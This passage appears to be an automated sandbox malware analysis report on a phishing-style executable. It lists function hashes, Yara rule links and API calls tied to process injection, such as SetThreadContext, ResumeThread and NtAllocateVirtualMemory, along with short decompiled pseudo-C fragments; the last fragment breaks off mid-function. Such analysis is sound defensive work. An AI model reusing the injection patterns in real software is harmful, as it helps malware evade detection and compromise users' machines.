                                      • Instruction Fuzzy Hash: 553176B8D04258AFCF10CFA9D984ADEFBB5BB19310F10902AE815B7310D775A946CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AACCC0, Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(?,?,?), ref: 00AADF02
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 21043ea65c4014d29af504c0776ba6c43549d80157ba31007f4dfe61159d3e7e
                                      • Instruction ID: 136838863f7a6a9bf784d80f42fb8cfdb93c02067bfe4c3c3b31ea69813e712e
                                      • Opcode Fuzzy Hash: 21043ea65c4014d29af504c0776ba6c43549d80157ba31007f4dfe61159d3e7e
                                      • Instruction Fuzzy Hash: AB4197B8D042589FCB10CFA9D884A9EFBF5BB49314F14906AE915BB310D334A945CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA2C1C, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00AA2CC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: a5d4efa18b38edab18b72133bcf8c28dc03c4cb3e7b7ab769b65f795372cb8a9
                                      • Instruction ID: 4c39ad1de7a46f3b5a0f429e4a13217ba6b323535a25f80317cc64bf4de37599
                                      • Opcode Fuzzy Hash: a5d4efa18b38edab18b72133bcf8c28dc03c4cb3e7b7ab769b65f795372cb8a9
                                      • Instruction Fuzzy Hash: BF31AAB9D042589FCF10CFA9E984AEEFBB0BB49310F14902AE814B7210D775A945CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA2C20, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00AA2CC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 21f07dc0efa40f2040c274e0920eb0a46810caf4b6ffd9e6490f11209797bf11
                                      • Instruction ID: cfd49f7ac0b279de0b938f212c161313b4fed76bfa78c23d97917f869f687c4e
                                      • Opcode Fuzzy Hash: 21f07dc0efa40f2040c274e0920eb0a46810caf4b6ffd9e6490f11209797bf11
                                      • Instruction Fuzzy Hash: 0B3199B9D042589FCF10CFA9D984ADEFBB4BB09320F14902AE814B7310D775A945CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462920, Relevance: 1.6, APIs: 1, Instructions: 91threadinjectionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetThreadContext.KERNELBASE(?,?), ref: 044629DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: ContextThread
                                      • String ID:
                                      • API String ID: 1591575202-0
                                      • Opcode ID: d47d82a333f1515ffb840e1e89dc46cfe094d980a15ae74f6e79b3448bb48759
                                      • Instruction ID: ea2d7d38d2a6c7a71f74ebd68c706d712221fc1dbd16d0158f39c2b2cac20481
                                      • Opcode Fuzzy Hash: d47d82a333f1515ffb840e1e89dc46cfe094d980a15ae74f6e79b3448bb48759
                                      • Instruction Fuzzy Hash: 2031BBB4D002589FCB10CFA9D884AEEFBF1BB49314F24806AE419B7310D778A945CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462928, Relevance: 1.6, APIs: 1, Instructions: 90threadinjectionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetThreadContext.KERNELBASE(?,?), ref: 044629DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: ContextThread
                                      • String ID:
                                      • API String ID: 1591575202-0
                                      • Opcode ID: ba8f5b87ea546ef9daa8309d2c2ac27b4c542312ef29657c2cf2d8968700d3db
                                      • Instruction ID: b87f2ed62bb183210e39f5c31423369b4b6997a94086a2da313dbaa733b5cff5
                                      • Opcode Fuzzy Hash: ba8f5b87ea546ef9daa8309d2c2ac27b4c542312ef29657c2cf2d8968700d3db
                                      • Instruction Fuzzy Hash: 4B319AB4D012589FCB10CFAAD984ADEFBF0BB49314F14806AE415B7310D778A945CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 044638A9, Relevance: 1.6, APIs: 1, Instructions: 86windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 0446394B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 61bb4665e73ad1c9d5d31e4b03b1791af47a45852e2342b6db72579156231792
                                      • Instruction ID: 991439a362e0264d65ee3faa27ab970cef81a1e1cf9d15ba8cb0039f8098922b
                                      • Opcode Fuzzy Hash: 61bb4665e73ad1c9d5d31e4b03b1791af47a45852e2342b6db72579156231792
                                      • Instruction Fuzzy Hash: 7631A8B8D012489FCF10CFA9D484ADEFBF4AB09310F14901AE814BB310D335A945CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 044638B0, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 0446394B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: eaa77b03a42e77bea067e7abba4934f1f8e0f969141daf71f926e4d013a465ad
                                      • Instruction ID: b6b251d990bfc7f58810f4396c40ae240847b3a0ba474d81e084c178d295a3d6
                                      • Opcode Fuzzy Hash: eaa77b03a42e77bea067e7abba4934f1f8e0f969141daf71f926e4d013a465ad
                                      • Instruction Fuzzy Hash: 263187B8D00248AFCF10CFA9D984ADEFBF4AB49310F14902AE815B7310D335A945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA3EB1, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • OutputDebugStringW.KERNELBASE(?), ref: 00AA3F52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: DebugOutputString
                                      • String ID:
                                      • API String ID: 1166629820-0
                                      • Opcode ID: dd693f99bec965c1f20d4d7409f7ba590a84048e6ed2a1575c2d2216ecac5371
                                      • Instruction ID: 73c19533d43fdcffdea2aa38d17201c176e40424d7862c5bfcd2b9ad137eb85e
                                      • Opcode Fuzzy Hash: dd693f99bec965c1f20d4d7409f7ba590a84048e6ed2a1575c2d2216ecac5371
                                      • Instruction Fuzzy Hash: DF31BAB4D002489FCF14CFAAD984AEEFBF1AB49314F14906AE818B7350D734A946CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA3EB8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      • OutputDebugStringW.KERNELBASE(?), ref: 00AA3F52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: DebugOutputString
                                      • String ID:
                                      • API String ID: 1166629820-0
                                      • Opcode ID: fa48c1201a8d0be89571343ccda9b8b648775f56490d61919dd1d7d73238e304
                                      • Instruction ID: a9b3abd3fb92cc4afdd66d64382ec8c272457f184fe06dd9cde9f8674fa8c721
                                      • Opcode Fuzzy Hash: fa48c1201a8d0be89571343ccda9b8b648775f56490d61919dd1d7d73238e304
                                      • Instruction Fuzzy Hash: B531B9B4D002489FCF14CFAAD984ADEFBF5AB49314F14802AE818B7350D734A945CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AADB48, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(?), ref: 00AADBDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 0cd753afaa0ddb0414c9b824939281639a45df5a1b0dc20838067a790fe73352
                                      • Instruction ID: e4a3839e2a65d43e01d39d32576134dc4b68e2c9d3bd6406ee75d38f5efcf125
                                      • Opcode Fuzzy Hash: 0cd753afaa0ddb0414c9b824939281639a45df5a1b0dc20838067a790fe73352
                                      • Instruction Fuzzy Hash: C231B9B8D002099FCB14CFAAD484ADEFBF5BB49314F14806AE818B7360D374A945CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA3FA9, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00AA402E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 88ab24b516c57248636d0f27ba0918eedd77ade0b63ffaa12532e5362e31a1ae
                                      • Instruction ID: 9acad6ae6f0b2a5b2388c23c09d888ccf31445faa5c05a01e36ae0d030c28fce
                                      • Opcode Fuzzy Hash: 88ab24b516c57248636d0f27ba0918eedd77ade0b63ffaa12532e5362e31a1ae
                                      • Instruction Fuzzy Hash: 9E31BBB4D002589FCB10CFA9D484AEEFBF4AB49324F14906AE915B7340C779A946CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462E90, Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 04462F16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: b929fb758a8972652b1c73594a66a023be97681983abb244ad30aa4350e31dc9
                                      • Instruction ID: ea920a755eb1f97d7d9d0769d03f4f20f1e72abd454b087f1c3f52bc5fe656e7
                                      • Opcode Fuzzy Hash: b929fb758a8972652b1c73594a66a023be97681983abb244ad30aa4350e31dc9
                                      • Instruction Fuzzy Hash: 4621A8B8D002089FDB10CFA9D484ADEFBF4BB09324F10906AE819B7300D374A946CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA3FB0, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00AA402E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: d762f5b896e3a931f931a34bc8cc68693e16f15b89a7ef8c82922c747f4246af
                                      • Instruction ID: 1670de87d6712bf98a1a8d10f0af2161354bd16a0306e0767b72afb08f17431f
                                      • Opcode Fuzzy Hash: d762f5b896e3a931f931a34bc8cc68693e16f15b89a7ef8c82922c747f4246af
                                      • Instruction Fuzzy Hash: 4D21CCB4D002189FCB10CFA9D484AEEFBF4BB49324F14906AE914B3340D379A945CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462E98, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 04462F16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 037aee7acd84de0c0e22ec062c85392f8d51987f169f227fd5db1ac7d99c374e
                                      • Instruction ID: 47cff856b6e7ce3e121b32c47a4e24f5e05f69917b2e12fe973fb712b2107f17
                                      • Opcode Fuzzy Hash: 037aee7acd84de0c0e22ec062c85392f8d51987f169f227fd5db1ac7d99c374e
                                      • Instruction Fuzzy Hash: 1D2196B8D002189FCB10CFA9D984ADEFBF4BB49324F14906AE819B7310D774A945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 04460860, Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: d,d@
                                      • API String ID: 0-3541757951
                                      • Opcode ID: a95963d386c2930c6e3a37f8bd89bb2552da1e24e7d9eaf62c6d98b4391f5a23
                                      • Instruction ID: e4197f8483730768552c0b4fd1316378c5a218dc6205ed99aa4e74fefca45925
                                      • Opcode Fuzzy Hash: a95963d386c2930c6e3a37f8bd89bb2552da1e24e7d9eaf62c6d98b4391f5a23
                                      • Instruction Fuzzy Hash: F1810874E0560ACFCF14CFA5D5854AEFBF2EF89300F14942AD41AB7618E734AA028F95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04460850, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: d,d@
                                      • API String ID: 0-3541757951
                                      • Opcode ID: b7c4edca29b401b40eb6dcc66a473fc6db5a2ebaf8606a96cb2bdb0840c908eb
                                      • Instruction ID: 3e1c356c8b1ed00d086cb7851e5f692d7a0e1f4b1eaf210f5b6b50e2801b5d2d
                                      • Opcode Fuzzy Hash: b7c4edca29b401b40eb6dcc66a473fc6db5a2ebaf8606a96cb2bdb0840c908eb
                                      • Instruction Fuzzy Hash: 38711874E0560ACFCF14CFA5D5855AEFBF2EF89300F10942AD416BB618E734AA028F95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA0480, Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: xJ_
                                      • API String ID: 0-1424034576
                                      • Opcode ID: 5ffa7712e2b70400e2bafcacf755ea730b53b9d5f29ba9a85527743f12aa3938
                                      • Instruction ID: 0f1bd0a24927760b66b1d0447794b995bf2a464e099d8a130ef272503c30a6ca
                                      • Opcode Fuzzy Hash: 5ffa7712e2b70400e2bafcacf755ea730b53b9d5f29ba9a85527743f12aa3938
                                      • Instruction Fuzzy Hash: 68414F71E016588BEB28CF6B8D4479EFAF3BFC9301F14C1BA950CA6254DB341A858F51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA0470, Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: xJ_
                                      • API String ID: 0-1424034576
                                      • Opcode ID: 1149b3b59f2fa5e98496a4a3d1f62ffe784a365459588cb5d1b81bc57c7a1311
                                      • Instruction ID: 911e717bbfd0952fd804760c24570146024e5510afafa1c50b1cdc1a5e5caebb
                                      • Opcode Fuzzy Hash: 1149b3b59f2fa5e98496a4a3d1f62ffe784a365459588cb5d1b81bc57c7a1311
                                      • Instruction Fuzzy Hash: 05414EB1E056588BEB28DF6B8D4479AFBF3BFC9300F14C1BA954CA6265DB3409858F11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04465BC5, Relevance: .6, Instructions: 642COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e58a6ae3aaae281a0dcc8790e84fc91772b2ec78d6a6cf5b33ac8c4e9a4f7d82
                                      • Instruction ID: a41f9eb5b8c257b882ed58343509150a102038fab0276e87e8b93666a513637f
                                      • Opcode Fuzzy Hash: e58a6ae3aaae281a0dcc8790e84fc91772b2ec78d6a6cf5b33ac8c4e9a4f7d82
                                      • Instruction Fuzzy Hash: 1CD199307003049FEB29EB76C5207AFB7E6AF89704F15446ED1469B392DB35E902CB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04460E98, Relevance: .1, Instructions: 148COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25613218a1409c1e843ece3281046023cf08987cbd09efa70fd63a34e57d787d
                                      • Instruction ID: c965c0872df73c97074c0b3ae213ec748c9720e84f70921ee078e64fe225f2e4
                                      • Opcode Fuzzy Hash: 25613218a1409c1e843ece3281046023cf08987cbd09efa70fd63a34e57d787d
                                      • Instruction Fuzzy Hash: D4511771E0462ACBDB68CF66C9447A9F7B2FFC8300F04C6EAD509A7614EB705A859F41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04460006, Relevance: .1, Instructions: 122COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ee26cd2b54ce56dab95cd1fc63fc7a112e1b46184794fa569fa2d6a20f1101c
                                      • Instruction ID: a73a9c40d5caf5a51445bb17bb7c1b205161506f3696bc1679956bf28956c182
                                      • Opcode Fuzzy Hash: 6ee26cd2b54ce56dab95cd1fc63fc7a112e1b46184794fa569fa2d6a20f1101c
                                      • Instruction Fuzzy Hash: DA516E70E092598FCB15CF65D89069EBBB2FF89300F14C0ABD449AB262DB345A45CF12
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04460E89, Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6db2b29d8ea802ceb512596527eba9d86494a8cd75eec0d65875de363d75fd7b
                                      • Instruction ID: 5407cf5ae50f0823a88747110cbd987628daa7a3409917e2b14776cd66f985ab
                                      • Opcode Fuzzy Hash: 6db2b29d8ea802ceb512596527eba9d86494a8cd75eec0d65875de363d75fd7b
                                      • Instruction Fuzzy Hash: 9D510B71E0161ACBDB68CF66C944799F7B2FFC8300F14C6EAD509A7614EB705A859F40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04460040, Relevance: .1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 162b937702295a35c6fc0f0c35f1d469715bab2e0faec2f559f7c84c07976a87
                                      • Instruction ID: 813171dc7b5632d1a199894c9c0374c14084a7552f55c38ad2dd7ca72fafa6c1
                                      • Opcode Fuzzy Hash: 162b937702295a35c6fc0f0c35f1d469715bab2e0faec2f559f7c84c07976a87
                                      • Instruction Fuzzy Hash: 22410770E052198FDF58CFAAD844A9EFBB2FF88200F14C1AAD409AB354DB349A45CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: Order 275594 04-D4E5A.exe PID: 3596 Parent PID: 2024 Order 275594 04-D4E5A.exeCOMMON

                                      Executed Functions

                                      Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 21%
                                      			E00419E0A(void* __eax, void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t22;
				void* _t33;
				void* _t34;
				intOrPtr* _t35;
				void* _t37;

				asm("xlatb");
				_t17 = _a4;
				_t35 = _a4 + 0xc48;
				E0041A960(_t33, _t17, _t35,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
				_t7 =  &_a32; // 0x414d42
				_t13 =  &_a8; // 0x414d42
				_t22 =  *((intOrPtr*)( *_t35))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36, _a40, _t34, _t37); // executed
				return _t22;
			}








                                      0x00419e0a
                                      0x00419e13
                                      0x00419e1f
                                      0x00419e27
                                      0x00419e32
                                      0x00419e4d
                                      0x00419e55
                                      0x00419e59

                                      APIs
                                      • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: BMA$BMA
                                      • API String ID: 2738559852-2163208940
                                      • Opcode ID: aea861afaa769c119aca9e2685254c71e41778b70c4eec47ad0bcbfb4e015ca4
                                      • Instruction ID: 29a18177f68743aada76fd6e57ce1dba14aa3a7e21a1c6f6eda7f9655dff5497
                                      • Opcode Fuzzy Hash: aea861afaa769c119aca9e2685254c71e41778b70c4eec47ad0bcbfb4e015ca4
                                      • Instruction Fuzzy Hash: F1F0F9B2210108AFCB18DF99CC80DEB77A9EF8C754F058258BE1DA7241C630E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                      0x00419e13
                                      0x00419e1f
                                      0x00419e27
                                      0x00419e32
                                      0x00419e4d
                                      0x00419e55
                                      0x00419e59

                                      APIs
                                      • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: BMA$BMA
                                      • API String ID: 2738559852-2163208940
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419F3C, Relevance: 1.6, APIs: 1, Instructions: 50memorynativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00419F3C(void* __ecx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {

				asm("in eax, 0x53");
				if (__ecx - 1 != 0) goto L3;
			}



                                      0x00419f3d
                                      0x00419f3f

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: adfe3479f324c5e3ebbcb3b25b618ca13a9346657f3e266373f84008338b02bf
                                      • Instruction ID: fdd33ceee7ad2c3648d1ae5bfefc6e1c143736940bcee3c42d57dda199676b0b
                                      • Opcode Fuzzy Hash: adfe3479f324c5e3ebbcb3b25b618ca13a9346657f3e266373f84008338b02bf
                                      • Instruction Fuzzy Hash: 190116B6210209AFCB18DF99DC81EEB73ADEF88714F158519FE0897241C634E861CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040ACD0(intOrPtr* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__ebx, __eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                      0x0040acec
                                      0x0040acef
                                      0x0040acf4
                                      0x0040acf9
                                      0x0040ad03
                                      0x0040ad08
                                      0x0040ad0b
                                      0x0040ad0d
                                      0x0040ad15
                                      0x0040ad1a
                                      0x0040ad1a
                                      0x0040ad21
                                      0x0040ad29
                                      0x0040ad2c
                                      0x0040ad2e
                                      0x0040ad42
                                      0x00000000
                                      0x0040ad44
                                      0x0040ad4a
                                      0x0040acfe
                                      0x0040acfe
                                      0x0040acfe

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                      • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00419D5A(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;

				_t34 = __edi -  *0x8b553090;
				_t17 = _a4;
